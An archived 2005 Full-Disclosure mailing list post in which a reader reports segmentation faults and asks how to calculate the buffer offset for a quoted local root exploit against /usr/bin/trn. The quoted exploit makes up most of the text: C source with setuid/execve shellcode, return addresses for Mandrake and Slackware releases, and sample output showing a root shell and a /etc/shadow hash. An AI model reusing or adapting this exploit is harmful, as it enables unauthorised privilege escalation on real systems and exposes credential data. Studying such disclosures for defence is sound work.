lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Message-ID: <20050126120527.GA6138@datakill.us>
From: msh at datakill.us (msh at datakill)
Subject: /usr/bin/trn local root exploit

I just tested this on Slackware 10 and I get nothing but Segementation
Faults. I see that you have the RET value filled in, but how am I to
calculate what to use for the BOO? You use 142 and 128 in the example.

On Wed, Jan 26, 2005 at 08:27:28AM +0000, Z z a g o r R wrote:
> /*
> /usr/bin/trn local root exploit
> By ZzagorR - http://www.rootbinbash.com
> */
> /*
> sh-2.05b$ ./trn
>  usage   : ./trn ret buf
>  example : ./trn 0xbfffff64
>  [+] mandrake   9.2  = 0xbfffff96
>  [+] slackware 10.0.0= 0xbfffff98
>  [+] slackware  9.1.0= 0xbfffff84
> sh-2.05b$
> sh-2.05b$ ./trn 0xbfffff84 128
>  [BOO  %] 128
>  [RET  %] bfffff84
> sh-2.05b#
> sh-2.05b# id
>  uid=0(root) gid=98(nobody) groups=98(nobody)
> sh-2.05b# cat /etc/shadow
>  root:$1$N88/N.aP$dBWcFHiYCXXNb77Y5LPNK1:12705:0:::::
> TEST :
> MANDRAKE 9.2
> SLACKWARE 10.0.0
> SLACKWARE 9.1.0
> http://www.rootbinbas.com/d0kum4n/trn-test.txt
> BOO:
> $trn `perl -e 'print "A" x 120'`
> $trn `perl -e 'print "A" x 124'`
> $trn `perl -e 'print "A" x 128'`
>  Segmentation fault
> BOO=128
> */
> 
> #include <stdio.h>
> #include <string.h>
> #define NEREDE "/usr/bin/trn"
> 
> char caylarbeles[] =
> "\x31\xc0\x31\xdb\xb0\x17\xcd\x80"
> "\x31\xc0\x50\x68\x2f\x2f\x73\x68"
> "\x68\x2f\x62\x69\x6e\x89\xe3\x50"
> "\x53\x89\xe1\x99\xb0\x0b\xcd\x80";
> 
> int main(int argc, char *argv[]){
> int bizim;
> char bufe[1000];
> char *tayfasi;
> 
> if (argc < 3) {
>  printf ("{           trn l0c4l r00t 3xpl01t          }\n");
>  printf ("{  By ZzagorR - http://www.rootbinbash.com  }\n");
>  printf ("{  usage   : %s ret buf                  }\n",argv[0]);
>  printf ("{  example : %s 0xbfffff99 142           }\n",argv[0]);
>  printf ("{  mandrake   9.2   = 0xbfffff96            }\n");
>  printf ("{  slackware 10.0.0 = 0xbfffff98            }\n");
>  printf ("{  slackware  9.1.0 = 0xbfffff84            }\n");
>  exit(1);
> }else{
>  unsigned long RET=strtoul(argv[1], NULL, 16);
>  int BOO = atoi(argv[2]);
>   printf ("[BOO  %] %i\n",BOO);
>   printf ("[RET  %] %x\n",RET);
>  tayfasi = bufe;
>  memset(bufe, 0x41,256-strlen(caylarbeles));
>  sprintf(bufe+256-strlen(caylarbeles), "%s", caylarbeles);
>  for ( bizim = BOO; bizim <= BOO+4; bizim+= 4 )
>   *(long*)(tayfasi+bizim) = RET;
>  execl(NEREDE, NEREDE , bufe, NULL);
> }
> }
> 
> _________________________________________________________________
> Yagmura yakalanmamak i?in sadece semsiyenize degil, MSN hava durumuna 
> g?venin! http://www.msn.com.tr/havadurumu/
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
> 

-- 
 _________________________
|                         |
|   http://datakill.us    |   
| irc.datakill.us #dkchat |
|_________________________|

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ